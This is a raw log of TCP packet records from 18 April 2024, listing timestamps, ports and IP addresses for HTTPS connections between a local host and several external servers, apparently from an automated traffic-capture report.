                                  Apr 18, 2024 01:13:12.009876013 CEST49738443192.168.2.413.107.246.57
                                  Apr 18, 2024 01:13:12.011002064 CEST49738443192.168.2.413.107.246.57
                                  Apr 18, 2024 01:13:12.011033058 CEST4434973813.107.246.57192.168.2.4
                                  Apr 18, 2024 01:13:12.012875080 CEST4434973713.107.246.57192.168.2.4
                                  Apr 18, 2024 01:13:12.013082027 CEST4434973713.107.246.57192.168.2.4
                                  Apr 18, 2024 01:13:12.013273954 CEST49737443192.168.2.413.107.246.57
                                  Apr 18, 2024 01:13:12.014616013 CEST49737443192.168.2.413.107.246.57
                                  Apr 18, 2024 01:13:12.014643908 CEST4434973713.107.246.57192.168.2.4
                                  Apr 18, 2024 01:13:12.095448017 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095501900 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095541954 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095561028 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.095590115 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095639944 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095644951 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.095666885 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095741987 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.095756054 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095889091 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.095937014 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.095946074 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.096157074 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.096210003 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.097104073 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.097124100 CEST44349739104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:12.097136974 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.097184896 CEST49739443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:12.102231026 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.102252960 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.102324009 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.102519989 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.102539062 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.126524925 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.126562119 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.126633883 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.126638889 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.126677036 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.126732111 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.126913071 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.126929045 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.127022028 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.127041101 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.202200890 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.202277899 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.202658892 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.202658892 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.202783108 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.333023071 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.333405972 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.333425999 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.334110975 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.334594965 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.334595919 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.334849119 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.375415087 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.426311016 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.426860094 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.426918030 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.427985907 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.428177118 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.450825930 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.451046944 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.451076984 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.451255083 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.451442957 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.451500893 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.452683926 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.452785015 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.453067064 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.453133106 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.453870058 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.453938007 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.458369970 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.458458900 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.458606958 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.458775997 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.458792925 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.458817959 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.458817005 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.458827972 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.458869934 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.500061989 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.500125885 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.500125885 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.500185966 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.550415039 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.598457098 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598576069 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598658085 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598727942 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.598751068 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598797083 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.598807096 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598910093 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.598958969 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.598973989 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599062920 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599114895 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.599123955 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599224091 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599275112 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.599282980 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599431038 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.599482059 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.608299971 CEST49743443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:12.608314991 CEST44349743104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:12.658802032 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.659028053 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.659125090 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.660866976 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.660943031 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.661073923 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.661099911 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.661309004 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.677515984 CEST49746443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.677575111 CEST4434974635.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.679083109 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.679116011 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.679177999 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.679619074 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.679627895 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.680432081 CEST49745443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.680490017 CEST4434974513.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.739561081 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.739610910 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.739679098 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.740093946 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.740118980 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.898133993 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.898535013 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.898562908 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.899657965 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.900079012 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.900235891 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.900242090 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.900276899 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:12.952164888 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:12.962337017 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.962722063 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.962752104 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.963624954 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.963686943 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.964271069 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.964328051 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.964497089 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:12.964505911 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:12.982573986 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.982768059 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:12.982821941 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.987435102 CEST49744443192.168.2.413.107.213.41
                                  Apr 18, 2024 01:13:12.987453938 CEST4434974413.107.213.41192.168.2.4
                                  Apr 18, 2024 01:13:13.014729023 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.136432886 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:13.136522055 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:13.136569023 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:13.136807919 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:13.136821985 CEST4434974735.190.80.1192.168.2.4
                                  Apr 18, 2024 01:13:13.136833906 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:13.136869907 CEST49747443192.168.2.435.190.80.1
                                  Apr 18, 2024 01:13:13.221477985 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.221626997 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.221678972 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.221710920 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.221802950 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.221858025 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.221872091 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.221966982 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222026110 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.222038984 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222131014 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222182989 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.222196102 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222289085 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222343922 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.222356081 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222489119 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.222538948 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.223865986 CEST49749443192.168.2.4172.67.204.185
                                  Apr 18, 2024 01:13:13.223895073 CEST44349749172.67.204.185192.168.2.4
                                  Apr 18, 2024 01:13:13.783750057 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:13.783771992 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:13.787497997 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:13.787637949 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:13.787650108 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.010416031 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.010844946 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:14.010870934 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.012501001 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.013587952 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:14.013587952 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:14.013674021 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.065510988 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:14.065529108 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:14.124232054 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:14.256701946 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.256740093 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.257381916 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.261316061 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.261353970 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.487656116 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.487953901 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.491163015 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.491177082 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.491583109 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.524504900 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.572115898 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.689693928 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.689908981 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.689919949 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.690012932 CEST49753443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.690228939 CEST4434975323.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.722456932 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.722480059 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.722553968 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.722893000 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.722906113 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.938047886 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.938136101 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.939727068 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.939737082 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.940061092 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:14.941224098 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:14.984123945 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:15.146023989 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:15.146090984 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:15.146136045 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:15.146934032 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:15.146951914 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:15.146960974 CEST49754443192.168.2.423.201.212.130
                                  Apr 18, 2024 01:13:15.146966934 CEST4434975423.201.212.130192.168.2.4
                                  Apr 18, 2024 01:13:22.210118055 CEST49672443192.168.2.4173.222.162.32
                                  Apr 18, 2024 01:13:22.210200071 CEST44349672173.222.162.32192.168.2.4
                                  Apr 18, 2024 01:13:24.000261068 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:24.000400066 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:24.000453949 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:25.750528097 CEST49752443192.168.2.464.233.177.105
                                  Apr 18, 2024 01:13:25.750554085 CEST4434975264.233.177.105192.168.2.4
                                  Apr 18, 2024 01:13:26.175820112 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.175854921 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.175930023 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.176848888 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.176863909 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.193526983 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.193609953 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.193701029 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.194416046 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.194453001 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.407032967 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.407309055 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.407324076 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.408801079 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.409353018 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.409492016 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.409496069 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.409529924 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.418731928 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.418910027 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.418962002 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.420078039 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.420453072 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.420635939 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.450740099 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.465866089 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.667587042 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667658091 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667696953 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667704105 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.667720079 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667763948 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.667768955 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667856932 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.667898893 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.667905092 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668009996 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668065071 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.668070078 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668333054 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668381929 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.668386936 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668668032 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.668720007 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.669485092 CEST49760443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.669498920 CEST44349760104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.686351061 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.728115082 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.799876928 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800002098 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800064087 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.800113916 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800221920 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800291061 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.800309896 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800398111 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800452948 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.800467014 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800553083 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800601006 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.800615072 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800702095 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800751925 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.800765038 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800896883 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.800978899 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.801501036 CEST49761443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:26.801529884 CEST44349761104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:26.805295944 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:26.805378914 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:26.805470943 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:26.805728912 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:26.805757046 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.031147003 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.031439066 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.031475067 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.032047033 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.032366991 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.032438040 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.032547951 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.076131105 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.289798021 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.289927959 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290015936 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290086031 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.290117979 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290164948 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.290208101 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290379047 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290426970 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.290437937 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290565014 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290618896 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.290630102 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290811062 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.290873051 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.291037083 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.291069031 CEST44349762104.21.235.182192.168.2.4
                                  Apr 18, 2024 01:13:27.291093111 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.291119099 CEST49762443192.168.2.4104.21.235.182
                                  Apr 18, 2024 01:13:27.299818039 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.299854040 CEST44349763104.21.50.103192.168.2.4
                                  Apr 18, 2024 01:13:27.299937010 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.300771952 CEST49763443192.168.2.4104.21.50.103
                                  Apr 18, 2024 01:13:27.300784111 CEST44349763104.21.50.103192.168.2.4
